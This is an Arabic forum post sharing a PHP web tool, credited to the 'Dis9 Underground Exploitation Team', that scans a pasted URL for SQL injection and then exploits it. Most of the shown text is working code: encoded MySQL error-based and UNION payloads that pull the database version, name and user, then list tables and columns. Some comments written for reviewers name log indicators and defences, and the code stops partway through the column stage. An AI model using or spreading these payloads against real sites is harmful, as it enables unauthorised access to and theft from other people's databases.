الكاتب : Dr.Attack | المشاهدات : 2,299 | الردود : 9
  1. Dr.Attack Developer

    [​IMG]

    إخواني الكرام، اليوم جبت معي سكريبت PHP SQL Injection sCanner بسيط ومعروف يقوم بفحص المواقع بحثاً عن ثغرات حقن SQL (SQL Injection). لاحظت أنه مبرمج من قبل الهكر الجزائري كيد انس (KedAns-Dz). عموماً مفيد ويمكن اعتباره بديلاً للبرامج التقليدية، فهو يعلمك الاعتماد على نفسك بعض الشيء.




    صوره توضيحيه "


    [​IMG]


    [​IMG]


    [​IMG]


    كود:
    <?php
    // Reviewer overview: single-file PHP web UI that appends URL-encoded MySQL
    // error-based and UNION SELECT probes to a user-supplied URL, fetches the result
    // with file_get_contents(), and searches the response for the marker ":oyu:".
    // Log/WAF indicators visible in this file: the hex literals 0x3a6f79753a (":oyu:")
    // and 0x3a70687a3a (":phz:"), FLOOR(RAND(0)*2) combined with GROUP BY x, and
    // reads from INFORMATION_SCHEMA. Every probe depends on the target concatenating
    // the request parameter into SQL and echoing the database error or row back;
    // parameterized queries and suppressed database error output remove both.
    echo "<title>Dis9-SQL  Injection  ToolKit v0.1</title>";
    /*****************************************************************
    
    
    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
    3                                                                      3
    3     ________   .__          ________                                 3
    7     \______ \  |__|  ______/   __   \     ____    ____    _____      7
    1      |    |  \ |  | /  ___/\____    /   _/ ___\  /  _ \  /     \     1
    3      |    `   \|  | \___ \    /    /    \  \___ (  <_> )|  Y Y  \    3
    3     /_______  /|__|/____  >  /____/   /\ \___  > \____/ |__|_|  /    3
    7             \/          \/            \/     \/               \/     7
    1                                                                      1
    3              >> The Underground Exploitation Team <<                 3
    3-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=3
    
    
    [+] Author : KedAns-Dz < ked-h [ at ] hotmail.com | 1337day.com | dis9.com >
    [+] Home : [ www.1337day.com]  * [ www.dis9.com ]
    [+] Facebook : [ http://facebook.com/KedAns ]
    [+] Cr3w : [ Dis9 Underground Exploitation Team ]
    [+] Greets to : Dz Offenders Cr3W <*> Algerian Cyber Army <*> Inj3ct0r Team
    
    
    ******************************************************************/
    
    
    // Detection probes (error-based). Four URL-encoded suffixes, one per quoting
    // context, in this order: ' then ') then none then ). Each embeds
    // CONCAT(0x3a6f79753a, <1 or 0>, 0x3a70687a3a, FLOOR(RAND(0)*2)), so the probe is
    // only readable when the target prints the MySQL error text into the page.
    // The integers 8041 / 7609 and the tags MEpR / ffAM are constants of this file
    // and can be matched verbatim in access logs or WAF rules.
    $a = array(
    '%27%20AND%20%28SELECT%208041%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20%28CASE%20WHEN%20%288041%3D8041%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR',
    '%27%29%20AND%20%28SELECT%208041%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20%28CASE%20WHEN%20%288041%3D8041%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM',
    '%20AND%20%28SELECT%208041%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20%28CASE%20WHEN%20%288041%3D8041%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
    '%29%20AND%20%28SELECT%208041%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20%28CASE%20WHEN%20%288041%3D8041%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609'
    );
    // Detection probes (UNION-based). Each selects NULLs plus one
    // CONCAT(0x3a6f79753a, 0x4244764877697569706b, 0x3a70687a3a), which decodes to the
    // text ":oyu:BDvHwiuipk:phz:", for one fixed column count. The "-6863" prefix and
    // the trailing %23 are likewise constant. The per-line column counts below are
    // the number of select-list items actually present in each string.
    $b = array(
    //UNION queries:
    '%20-6863%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20CONCAT%280x3a6f79753a%2C0x4244764877697569706b%2C0x3a70687a3a%29%2C%20NULL%2C%20NULL%2C%20NULL%23', //8 cols
    '%20-6863%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20CONCAT%280x3a6f79753a%2C0x4244764877697569706b%2C0x3a70687a3a%29%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23', //10 cols
    '%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20CONCAT%280x3a6f79753a%2C0x4244764877697569706b%2C0x3a70687a3a%29%2C%20NULL%23', //8cols v2
    '%20-6863%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%280x3a6f79753a%2C0x4244764877697569706b%2C0x3a70687a3a%29%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23',//6 cols
    );
    
    
    
    
    
    
    //globals
    // $string and $string2 are MySQL error fragments; $string3 is the marker the
    // detection loops in frame1() search for. The frame functions declare $string,
    // $string2, $pos, $url2 and $html as globals, but the visible detection code
    // tests only $string3.
    $string= 'You have an error in your SQL syntax';
    $string2= 'supplied argument is not a valid MySQL';
    $string3= ':oyu:';
    $string4= 'dummy request';
    // These three statements run before the request-variable import below.
    @$url2 = "$url\")'";
    $html = @file_get_contents("$url2");
    $pos = strpos($html, $string);
        
    
    
    //--------------------------------------------------------------------------------------------------------------
    
    
    
    
        // Re-creates register_globals: every GET, POST and COOKIE key becomes a global
        // variable of the same name (COOKIE written last, so it wins). Any request can
        // therefore overwrite the globals defined above, including $a, $b and $string3.
        // A host that serves this file exposes that to every visitor.
        foreach ($_GET as $key => $val) $$key=htmldecode($val);
        foreach ($_POST as $key => $val) $$key=htmldecode($val);
        foreach ($_COOKIE as $key => $val) $$key=htmldecode($val);
    
    
       
        
    // Dispatch: the request variable "frame" (imported above) selects which pane to
    // render; anything else falls through to the frameset page.
    switch (@$frame){
            case 1: frame1(); break;
            case 2: frame2(); break;
            case 3: frame3(); break;
            case 4: frame4(); break;
            case 5: frame5(); break;
            default:
                switch(@$action){
                    default: frameset();
      
                }
            }
    
    
    /**
     * Decode HTML entities in a request value.
     *
     * Non-string values are handed back untouched. For strings, entities are
     * decoded with html_entity_decode(); when get_magic_quotes_gpc() reports
     * true, the decoded text is additionally passed through stripslashes().
     */
    function htmldecode($str)
    {
        if (!is_string($str)) {
            return $str;
        }

        $quoted = get_magic_quotes_gpc();
        $decoded = html_entity_decode($str);

        return $quoted ? stripslashes($decoded) : $decoded;
    }
    /**
     * Emit the opening <html>/<head> markup shared by every frame.
     *
     * $plus is interpolated into the <head> as-is, without escaping. All visible
     * callers in this file call html_header() with no argument.
     */
    function html_header($plus=""){
    
    
    echo "
    <html>
    <head>
    <meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">
    
    
    $plus
     <style>
        body {
            font-family : Arial;
    
    
            font-weight : normal;
            color: green;
            background-color: black;
        }
        </style>
    </head>
    
    
    ";
    }
    
    
    //------------------------------------------------------------------------------------------------------------------
    
    
    //Functions for queries and stuffs
    
    
    // Top-level code: runs on every request, before any frame function is called
    // explicitly by the user. $mode_eb and $url are not assigned anywhere above, so
    // here they can only come from the GET/POST/COOKIE import loop.
    // For the selected quoting context (1-4, same order as $a) it builds three probe
    // URLs that ask the target for VERSION(), DATABASE() and CURRENT_USER(), each
    // wrapped between 0x3a6f79753a and 0x3a70687a3a. The constants 6722, 6870 and 2525
    // identify these three requests in logs. If no mode matches, the three variables
    // are never assigned.
    if(@$mode_eb == 1){
    @$version = "$url+%27%20AND%20%28SELECT%206722%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
    @$database = "$url+%27%20AND%20%28SELECT%206870%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
    @$usuario = "$url+%27%20AND%20%28SELECT%202525%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
    
    
    
    
    }elseif(@$mode_eb == 2){
    @$version = "$url+%27%29%20AND%20%28SELECT%206722%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
    @$database = "$url+%27%29%20AND%20%28SELECT%206870%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
    @$usuario = "$url+%27%29%20AND%20%28SELECT%202525%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
    
    
    
    
    }elseif(@$mode_eb == 3){
    @$version = "$url+%20AND%20%28SELECT%206722%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
    @$database = "$url+%20AND%20%28SELECT%206870%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
    @$usuario = "$url+%20AND%20%28SELECT%202525%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
    
    
    
    
    }elseif(@$mode_eb == 4){
    @$version = "$url+%29%20AND%20%28SELECT%206722%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
    @$database = "$url+%29%20AND%20%28SELECT%206870%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
    @$usuario = "$url+%29%20AND%20%28SELECT%202525%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
    
    
    
    
    
    
    }
    
    
        // Three server-side fetches of the URLs built above; warnings are silenced
        // with @ and the raw response bodies are kept in globals.
        @$versio = @file_get_contents("$version");
        @$databas = @file_get_contents("$database");
        @$usuari = @file_get_contents("$usuario");
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    /**
     * Render a string as a "0x"-prefixed hexadecimal literal.
     *
     * Returns FALSE for null. Each byte is converted with dechex(), whose output
     * is not zero-padded, so a byte below 0x10 contributes a single digit.
     */
    function hexEncode($str)
    {
        if ($str === null) {
            return FALSE;
        }

        $digits = "";
        $pos = 0;
        while (isset($str[$pos])) {
            $digits .= dechex(ord($str[$pos]));
            $pos++;
        }

        return "0x" . $digits;
    }
    /**
     * Turn a "0x..." hexadecimal literal back into the bytes it encodes.
     *
     * Returns FALSE when the input does not start with "0x" followed by at least
     * one hex digit; the pattern is anchored at the start only. After the prefix
     * is dropped, the remainder is consumed two characters at a time.
     */
    function asciiEncode($str)
    {
        if (preg_match("/^0x[A-Fa-f0-9]+/", $str) !== 1) {
            return FALSE;   // not a hex literal
        }

        $hex = substr($str, 2);
        $decoded = "";
        $offset = 0;
        while (isset($hex[$offset])) {
            $pair = substr($hex, $offset, 2);
            $decoded .= chr(hexdec($pair));
            $offset += 2;
        }

        return $decoded;
    }
    /**
     * Extract the text that sits between the first ":oyu:" marker and the next
     * ":phz:" marker in a response body.
     *
     * Returns an empty string when ":oyu:" does not occur. When ":phz:" is
     * missing, everything after ":oyu:" up to the next ":oyu:" (or the end) is
     * returned.
     */
    function GetBetween($content)
    {
        $afterStart = explode(":oyu:", $content);
        if (!isset($afterStart[1])) {
            return '';
        }

        $beforeEnd = explode(":phz:", $afterStart[1]);

        return $beforeEnd[0];
    }
    
    
    /**
     * Loosely compare the argument with the function-local $detectar and return
     * "vulnerable" on equality; otherwise nothing is returned.
     *
     * $detectar is neither a parameter nor declared global here, so the
     * comparison is against an unset local. Both call sites in frame1() discard
     * the outcome (the if body is empty).
     */
    function mode_comaprison_eb($detectar_t)
    {
        $matches = ($detectar_t == @$detectar);
        if ($matches) {
            return "vulnerable";
        }
    }
    /**
     * UNION-query counterpart of mode_comaprison_eb(): loosely compares the
     * argument with the function-local $detectar2 (unset in this scope) and
     * returns "vulnerable" on equality; otherwise nothing is returned.
     */
    function mode_comaprison_uq($detectar_t)
    {
        //UNION query:
        $matches = ($detectar_t == @$detectar2);
        if ($matches) {
            return "vulnerable";
        }
    }
    
    
    
    
    
    
    /**
     * Default page: a frameset that loads this same script four times with
     * ?frame=1 .. ?frame=4 (the frame=5 entry is inside an HTML comment).
     *
     * $_SERVER['PHP_SELF'] is written into each src attribute without
     * htmlspecialchars(), so the request path is reflected into the markup as-is.
     */
    function frameset(){
        
        html_header();
            
        echo "
        <frameset rows=\"*,25%\" framespacing=\"0\" frameborder=\"0\">
                <frame src=\"".$_SERVER['PHP_SELF']."?frame=1\" name=frame1 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
            <frameset cols=\"33%,*,33%\" framespacing=\"0\" frameborder=\"0\">
                <frame src=\"".$_SERVER['PHP_SELF']."?frame=2\" name=frame2 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
            <frame src=\"".$_SERVER['PHP_SELF']."?frame=3\" name=frame3 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
                <frame src=\"".$_SERVER['PHP_SELF']."?frame=4\" name=frame4 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
            </frameset>
            <!--    <frame src=\"".$_SERVER['PHP_SELF']."?frame=5\" name=frame5 border=\"0\" marginwidth=\"0\" marginheight=\"0\">!-->
           </frameset>
        ";
        echo "</html>";
    }
    /**
     * Frame 1: the URL form plus the detection pass.
     *
     * On a POST with forma=search, the submitted URL is fetched server-side once
     * per entry of $a and once per entry of $b (eight requests with the arrays
     * defined in this file). Each request is the URL, a literal "+", and one
     * probe string, and the response is searched for $string3 (":oyu:").
     *
     * What a reviewer should note about the script itself:
     *  - the URL is fetched with file_get_contents() with no scheme or host
     *    restriction, so the machine hosting this file relays requests for
     *    whoever can reach it;
     *  - $_POST['url'], $mode_eb and $_SERVER['PHP_SELF'] are echoed into HTML
     *    without htmlspecialchars();
     *  - PHP's http wrapper sends no User-Agent header unless the user_agent ini
     *    setting is configured, which is a common trait of these requests in
     *    target-side logs (NOTE(review): confirm against the deployment's ini).
     */
    function frame1(){
                global $string2, $string, $string3, $pos, $url2, $html, $mode_eb, $a, $b;
                 global $action, $detectar_t;
        html_header();
         echo "<body>\n";
    
    
        
    
    
    echo " 
    <center>
    <table border=0 width=700 align=center><tr><Td><center><p style='font-size: 18pt;'>
    <b>Dis9-SQL Inj3ction ToolKit v0.1 | KedAns-Dz</br></b></td></tr>
    </center>
    
    
    </table>
    [!] Usage: <br>
    [+] Paste URL (example: http://site.com/test.php?id=1)<br>
    [+] Press \"seach\" button.<br>
    [+] Exploit iT !<br><br>
    <table>
    <tr><td>
    
    
    <center>
    <form action=\" ".$_SERVER['PHP_SELF']."?frame=1\" method=\"post\" name=\"forma\" id=\"forma\">
    url: <input type=\"text\" name=\"url\" id=\"url\" size=\"65\"/>
    <input type=\"submit\" name=\"forma\" id=\"form\" value=\"search\"/>
    </form>
    </center>
    ";
    
    
    if(isset($_POST['forma']) && $_POST['forma']=='search')
    {
    
    
        // Submitted URL is echoed back verbatim (no output escaping).
        $url = $_POST["url"];
        echo "Testing: $url<br><br>";
    
    
            $a;
            // Error-based pass: one outbound GET per probe in $a.
            foreach($a as $detectar){
    
    
            $url3 = "$url+$detectar";
            @$html2 = file_get_contents("$url3");
    
    
            // A hit is the marker ":oyu:" appearing in the fetched body; the loose
            // "== true" treats any non-zero offset as a match.
            if(strpos($html2, @$string3)==true)
            {
                if(mode_comaprison_eb($detectar) == "vulnerable"){
    
    
                }
            // $as is a running counter incremented once per probe; its value at the
            // time of a hit is stored as the mode passed on to the later frames.
            $mode_eb = $as;
            
            echo "<font color=blue>Detected: ERROR BASED inyection =)</font> <br>QUERY: <font size=2 color=red>$detectar</font><br><br>";
            @$eb_i = 1;
            
            }
            $as++;
            
            }
            // After a hit, render a form that posts url and mode ("lol") to frame 2.
            if (@$eb_i ==1){
                    echo "
                    <center>
        <form action=\"".$_SERVER['PHP_SELF']."?frame=2\" method=\"post\" target=\"frame2\" name=\"tablas\" id=\"tablas\">
        <input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
        <input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_eb\"/>
        <input type=\"submit\" name=\"tablas\" id=\"tablas\" value=\"GET Exploit\"/>
        
        </form> 
        </center>
        ";}
    
    
            // UNION pass: one outbound GET per probe in $b, same marker test.
            foreach($b as $detectar2){
            $url6 = "$url+$detectar2";
            @$html8 = file_get_contents("$url6");    
            
            if(strpos(@$html8, @$string3)==true){
                if(mode_comaprison_uq($detectar2) == "vulnerable"){
                    }
                
            echo "<center><font color=blue>Detected: UNION query inyection =)</font> <br>QUERY: <font size=2 color=red>$detectar2</font><br><br></center>";
            $uq_i = 1;
            }        
            
            }
            if((@$eb_i == 0) && (@$uq_i==0))
            {
            echo "<center><br><font color=red>No  Injection  point founded =(</font><br><br></center>";
            }
    
    
    
    
    }
         echo "</body>\n</html>";    
    
    
    }
    /**
     * Frame 2: table enumeration, reached by the "GET Exploit" form of frame 1.
     *
     * Reads url and lol (quoting context 1-4) from POST. It first requests a
     * COUNT(*) over INFORMATION_SCHEMA.TABLES for the current schema, then issues
     * one request per loop iteration for a table_name with LIMIT $i,1. Each value
     * is offered in a <select> whose option value is the hexEncode()d name.
     *
     * Target-side this appears as a run of near-identical requests that differ
     * only in the LIMIT offset and carry the constants 3830 / 7288. The database
     * account needs nothing beyond what the application already has; keeping
     * database errors out of responses is what denies the read-back channel.
     * $url and $mode_eb are written into the form without output escaping.
     */
    function frame2(){
        html_header();
    global $string2, $string, $string3, $pos, $url2, $html;
    global $action, $detectar_t;
    
    
    if(isset($_POST['tablas']) && $_POST['tablas']=='GET Exploit')
    {
        
    
    
        $url = $_POST["url"];
        $mode_eb = $_POST["lol"];
        
    // Table-count request, one variant per quoting context.
    if ($mode_eb==1){ 
        @$tablas2 = "$url+%27%20AND%20%28SELECT%203830%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
        }
    elseif ($mode_eb==2){ 
        @$tablas2 = "$url+%27%29%20AND%20%28SELECT%203830%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
        }
    elseif ($mode_eb==3){ 
        @$tablas2 = "$url+%20AND%20%28SELECT%203830%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
        }
    elseif ($mode_eb==4){ 
        @$tablas2 = "$url+%29%20AND%20%28SELECT%203830%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
        }
    $tabla = @file_get_contents("$tablas2");    
    
    
    
    
        $i = -1;   
          
         
    echo "
        <form action=\"".$_SERVER['PHP_SELF']."?frame=3\" target=\"frame3\" method=\"post\" name=\"columnas\" id=\"columnas\">
        <input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
        <select name=\"num\" id=\"num\>";
        // One outbound request per iteration; the loop bound is the count parsed
        // from the first response.
        while ($i <= (GetBetween($tabla)-1)):
        
            if($mode_eb == 1){
            @$_tablas = "%27%20AND%20%28SELECT%207288%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
    }elseif($mode_eb == 2){
            @$_tablas = "%27%29%20AND%20%28SELECT%207288%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
    }elseif($mode_eb == 3){
            @$_tablas = "%20AND%20%28SELECT%207288%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
    }elseif($mode_eb == 4){
            @$_tablas = "%29%20AND%20%28SELECT%207288%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
    }
        $nums_tablas = "$url+$_tablas";
        
        // The full probe URL is printed into the page on every iteration.
        echo $nums_tablas;
        $n_tabla = file_get_contents("$nums_tablas");
        
        $num = GetBetween($n_tabla);
        echo "<option value=\"".hexEncode($num)."\">$num</option>";
        $i++;
        endwhile;
    
    
        echo "</select>";
        echo"<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_eb\"/>";
        echo "    <input type=\"submit\" name=\"columnas\" id=\"columnas\" value=\"columns\"/>";
        echo "<form>";
    
    
    }
    //STILL PLAYING WITH UNION QUERIES
    
    
    
    
        }
    /**
     * Frame 3: column enumeration for one table, reached by the "columns" form
     * of frame 2.
     *
     * Reads url, num (the table name as submitted by the form, a 0x... literal
     * when it came from frame 2) and lol (quoting context) from POST. It requests
     * a COUNT(*) over INFORMATION_SCHEMA.COLUMNS for that table, then one
     * column_name per iteration with LIMIT $i,1. The constants 1906 / 5724 and
     * the table_name=0x... comparison identify these requests in logs.
     *
     * $table_n is interpolated into the probe exactly as posted, and $url,
     * $mode_eb and the decoded table name are written into the form without
     * output escaping.
     */
    function frame3(){
    html_header();
    global $string2, $string, $string3, $pos, $url2, $html;
    global $action, $detectar_t;
    
    
    
    
    if(isset($_POST['columnas']) && $_POST['columnas']=='columns')
    {
        $url = $_POST["url"];
        $table_n = $_POST["num"];
        $mode_eb = $_POST["lol"];
        
            // Column-count request, one variant per quoting context.
            if($mode_eb == 1){
